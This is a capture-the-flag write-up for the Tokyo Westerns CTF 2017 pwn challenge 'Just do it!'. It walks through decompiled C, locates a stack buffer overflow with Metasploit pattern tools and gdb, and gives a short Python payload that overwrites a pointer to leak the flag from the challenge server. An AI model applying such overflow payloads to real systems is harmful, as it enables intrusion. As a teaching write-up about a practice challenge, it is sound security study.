[Pwn] Tokyo Westerns CTF 3rd 2017 - Just do it!


Just do it!
Problem

Do it! Do it!

nc pwn1.chal.ctf.westerns.tokyo 12345
(Alternative port: nc pwn1.chal.ctf.westerns.tokyo 12482)

just_do_it

We start by disassembling the binary in IDA and using its decompiler to get C pseudocode:

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char s; // [sp+8h] [bp-20h]@7
  FILE *stream; // [sp+18h] [bp-10h]@1
  char *v6; // [sp+1Ch] [bp-Ch]@1

  setvbuf(stdin, 0, 2, 0);
  setvbuf(stdout, 0, 2, 0);
  setvbuf(_bss_start, 0, 2, 0);
  v6 = failed_message;
  stream = fopen("flag.txt", "r");
  if ( !stream )
  {
    perror("file open error.\n");
    exit(0);
  }
  if ( !fgets(flag, 48, stream) )
  {
    perror("file read error.\n");
    exit(0);
  }
  puts("Welcome my secret service. Do you know the password?");
  puts("Input the password.");
  if ( !fgets(&s, 32, stdin) )
  {
    perror("input error.\n");
    exit(0);
  }
  if ( !strcmp(&s, PASSWORD) )
    v6 = success_message;
  puts(v6);
  return 0;
}

We can clearly see a buffer overflow here: the password that strcmp compares comes from stdin, and fgets reads up to 32 bytes into s, which has far less room than that on the stack (s sits at bp-20h while v6 sits at bp-Ch). If we give a password longer than s can hold, we overflow into the neighbouring locals. In this case we don't even need to modify the return address: we can simply overwrite v6, the pointer that puts prints, with the address of the flag variable, which main filled from the file "flag.txt" on the server.

First, let's find the offset. We could read it from the assembly by checking how much stack space is reserved for s relative to ebp, or we can simply use gdb with some help from Metasploit's pattern tools:

$ /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 50 
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab
$ gdb ./justdoit
pwndbg> r
Starting program: /home/evilgod/Documents/Hacking/ctf/tokyo/pwn/justdoit/just
Welcome my secret service. Do you know the password?
Input the password.
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab

Program received signal SIGSEGV (fault address 0x37614136)

We can see it crashed at address 0x37614136; we can turn that value back into an offset with Metasploit's pattern_offset:

$ /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 0x37614136
[*] Exact match at offset 20

Now we know we need to write 20 bytes before we reach v6, and anything after them overwrites it. Next, let's use IDA to get the address where our flag is stored:

Flag Address

Finally, we write a script:

import os
import struct

FLAG = 0x0804A080                              # address of the flag buffer, read off in IDA
payload = b'A' * 20 + struct.pack('<L', FLAG)  # 20 bytes of padding, then overwrite v6
os.write(1, payload + b'\n')                   # raw bytes on stdout, works under Python 2 and 3
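To make clear why the fault address 0x37614136 maps to offset 20, and to cross-check that number against the frame offsets IDA reports (s at bp-20h, v6 at bp-Ch), here is an added Python re-implementation of the two Metasploit helpers used above together with the payload layout of the script. This is my own example, not the author's script or Metasploit's code, and the function names are my own.

```python
import struct

# Character sets used by Metasploit's pattern_create.rb, in the same order.
UPPER = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
LOWER = "abcdefghijklmnopqrstuvwxyz"
DIGIT = "0123456789"


def pattern_create(length):
    """Same cyclic pattern as pattern_create.rb: Aa0Aa1...Aa9Ab0..., cut to `length`."""
    chunks = []
    for u in UPPER:
        for l in LOWER:
            for d in DIGIT:
                chunks.append(u + l + d)
                if 3 * len(chunks) >= length:
                    return "".join(chunks)[:length]
    return "".join(chunks)[:length]


def pattern_offset(fault_address, length=8192):
    """What pattern_offset.rb -q does: take the 4 little-endian bytes of the
    faulting value (0x37614136 -> b"6Aa7") and find them in the pattern.
    Returns -1 when the value does not come from the pattern at all."""
    needle = struct.pack("<L", fault_address)
    return pattern_create(length).encode("ascii").find(needle)


def frame_distance(buf_off, ptr_off):
    """Cross-check from the IDA frame: with s at bp-0x20 and v6 at bp-0x0C,
    input overwrites v6 after buf_off - ptr_off bytes."""
    return buf_off - ptr_off


def build_payload(offset, target):
    """Padding up to the pointer slot, then the address puts() will print from."""
    return b"A" * offset + struct.pack("<L", target)
```

Both routes agree on 20, and the resulting 24-byte payload fits inside the 32-byte fgets read, which is why the overwrite works without touching the return address.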

Getting the flag:

$ python justdoit.py | nc pwn1.chal.ctf.westerns.tokyo 12482
Welcome my secret service. Do you know the password?
Input the password.
TWCTF{pwnable_warmup_I_did_it!}